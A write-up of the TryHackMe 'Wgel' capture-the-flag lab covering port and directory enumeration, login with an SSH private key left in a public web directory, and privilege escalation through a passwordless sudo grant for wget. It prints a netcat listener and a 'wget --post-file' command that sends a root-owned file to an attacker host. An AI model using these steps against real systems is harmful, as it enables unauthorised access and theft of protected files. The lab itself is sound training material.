TryHackMe: Wgel write-up
In this article we'll tackle an easy CTF on TryHackMe. We'll enumerate a Linux box, find misplaced credentials and exploit a common Linux tool to escalate our privileges and exfiltrate information.
Link: https://tryhackme.com/room/wgelctf
Difficulty: Easy
Authors: MrSeth6797
First steps and enumeration
Our journey into this CTF challenge begins with a comprehensive nmap scan to identify active services on the target machine. The scan revealed two open ports: an HTTP server on port 80 and SSH on port 22, indicating potential targets for exploration. The HTTP server is running Apache httpd 2.4.18 on Ubuntu, while the SSH service is OpenSSH 7.2p2 Ubuntu 4ubuntu2.8.:
$ nmap -sV -sT -p- -oN nmap/full-scan.nmap $IPStarting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-15 15:18 CET
Nmap scan report for 10.10.222.165
Host is up (0.042s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.88 seconds
It looks like the web server hosts the default web page bundled with Apache installation. However a quick GoBuster scan with the directory-list-lowercase-2.3-medium.txt list shows that there is something more than meets the eye:
$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt | tee gobuster.log
===============================================================
Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.222.165
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/sitemap (Status: 301) [Size: 316] [--> http://10.10.222.165/sitemap/]
Progress: 62904 / 207644 (30.29%)
There's a hidden /sitemap directory. An inspection of the website's source code also revealed a comment potentially hinting at a username:
<!-- Jessie don’t forget to udate the website. -->
The detail noted appears to be a potential username, which could be important later on. Next, we visited the /sitemap area of the website.
It's a template from ColorLib, but nothing stood out at first. To dig deeper, I used GoBuster for a directory search. When the initial scan with one wordlist didn't show results, I switched to the DirBuster wordlist for a more thorough search:
$ gobuster dir -u http://$IP/sitemap -w /usr/share/wordlists/dirb/common.txt | tee gobuster-sitemap.log ===============================================================
Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.222.165/sitemap
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]/.htaccess (Status: 403) [Size: 278]/.htpasswd (Status: 403) [Size: 278]
/.ssh (Status: 301) [Size: 321] [--> http://10.10.222.165/sitemap/.ssh/]
/css (Status: 301) [Size: 320] [--> http://10.10.222.165/sitemap/css/]
/fonts (Status: 301) [Size: 322] [--> http://10.10.222.165/sitemap/fonts/]
/images (Status: 301) [Size: 323] [--> http://10.10.222.165/sitemap/images/]
/index.html (Status: 200) [Size: 21080]
/js (Status: 301) [Size: 319] [--> http://10.10.222.165/sitemap/js/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
There is a very interesting hidden directory called .ssh. If we take a peek inside we find an SSH private key. We can make a handy backup copy of it on our machine and use it with the username jessie to access the target box. Inside Jessie's Documents directory we can finally get the user flag.
Privilege escalation
After gaining access to the system, we proceeded to further enumerate its configuration. A quick check with sudo -l revealed a particularly interesting privilege assigned to the user jessie. The system allows jessie to execute wget as root without the need for a password:
$ sudo -l
Matching Defaults entries for jessie on CorpOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jessie may run the following commands on CorpOne:
(ALL : ALL) ALL (root) NOPASSWD: /usr/bin/wget
Since we can't see what's inside the /root directory, but guessing that the root flag might be called root_flag.txt (just like the user flag was named user_flag.txt), we can use wget to try and grab it.
First, let's set up a listener on our local machine to receive the file. This can be done using netcat:
$ nc -vlnp 1337
Now let's use wget to send the contents of the root_flag.txt file from the target system to our listener:
$ sudo wget --post-file=/root/root_flag.txt http://<Attacker IP>:1337
And just like that, we capture the root flag right in our terminal.